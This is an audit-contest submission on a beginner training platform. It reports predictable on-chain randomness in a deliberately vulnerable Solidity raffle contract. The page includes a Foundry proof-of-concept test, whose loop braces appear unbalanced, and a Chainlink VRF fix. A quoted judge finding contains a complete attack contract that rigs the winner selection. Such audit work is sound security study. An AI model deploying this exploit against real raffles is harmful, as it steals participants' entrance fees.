Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Pseudo-Randomness Allows Attacker to Guarantee Raffle Win

choco324

Description

The selectWinner() function is intended to randomly select a winner from the players array using a hash of on-chain data to determine the winning index.
The randomness source relies entirely on predictable values (msg.sender, block.timestamp, block.difficulty), allowing an attacker to pre-calculate the winning index and manipulate players.length by entering additional addresses until the result points to an address they control.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

@> uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

// ...

}

All inputs to this hash are predictable or controllable:

msg.sender - The attacker controls this by calling selectWinner() themselves
block.timestamp - Publicly known at transaction execution time
block.difficulty - Publicly available blockchain state

Risk

Likelihood:

An attacker enters the raffle with multiple addresses they control
The attacker waits until raffleDuration has passed, then calls selectWinner() directly
The attacker pre-computes the hash output since all inputs are known values

Impact:

The attacker guarantees winning the raffle and claims 80% of the total prize pool
Legitimate participants lose their entrance fees to a rigged outcome
The raffle system becomes fundamentally unfair and exploitable

Proof of Concept

The following test demonstrates how an attacker can guarantee a raffle win by:

Calculating the pseudo-random value using known on-chain data
Iterating through possible players.length values to find one where the winning index falls within their controlled address range
Entering the raffle with exactly that number of addresses
Calling selectWinner() to claim the prize

function test_psuedorandomness() public {

// 1. Legitimate players enter the raffle

address[] memory legitimatePlayers = new address[](4);

legitimatePlayers[0] = playerOne;

legitimatePlayers[1] = playerTwo;

legitimatePlayers[2] = playerThree;

legitimatePlayers[3] = playerFour;

puppyRaffle.enterRaffle{value: entranceFee * 4}(legitimatePlayers);

// 2. Attacker setup

address attacker = address(100);

vm.deal(attacker, 100 ether);

vm.warp(block.timestamp + duration + 1);

// 3. Pre-calculate the "random" value

uint256 randomValue = uint256(keccak256(abi.encodePacked(attacker, block.timestamp, block.difficulty)));

// 4. Find how many addresses to add so winning index is attacker-controlled

uint256 originalPlayersCount = 4;

uint256 attackerAddressesNeeded = 0;

for (uint256 i = 1; i <= 100; i++) {

uint256 totalPlayers = originalPlayersCount + i;

uint256 winnerIndex = randomValue % totalPlayers;

if (winnerIndex >= originalPlayersCount) {

attackerAddressesNeeded = i;

break;

}

// 5. Attacker enters with calculated number of addresses

address[] memory attackerPlayers = new address[](attackerAddressesNeeded);

for (uint256 i = 0; i < attackerAddressesNeeded; i++) {

attackerPlayers[i] = address(uint160(101 + i));

}

vm.prank(attacker);

puppyRaffle.enterRaffle{value: entranceFee * attackerAddressesNeeded}(attackerPlayers);

// 6. Attacker triggers winner selection and wins

vm.prank(attacker);

puppyRaffle.selectWinner();

// 7. Verify attacker won

address winner = puppyRaffle.previousWinner();

bool attackerWon = false;

for (uint256 i = 0; i < attackerAddressesNeeded; i++) {

if (winner == address(uint160(101 + i))) {

attackerWon = true;

break;

}

assertTrue(attackerWon, "Attacker should have won the raffle");

}

Recommended Mitigation

Integrate Chainlink VRF to obtain cryptographically secure randomness that cannot be predicted or manipulated.

+ import "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

- function selectWinner() external {

- require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

- require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

- address winner = players[winnerIndex];

- // ...

- }

+ function requestSelectWinner() external {

+ require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

+ require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

+ COORDINATOR.requestRandomWords(

+ keyHash,

+ subscriptionId,

+ requestConfirmations,

+ callbackGasLimit,

+ 1 // numWords

+ );

+ }

+ function fulfillRandomWords(uint256, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ address winner = players[winnerIndex];

+ // ... rest of winner selection logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 7 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!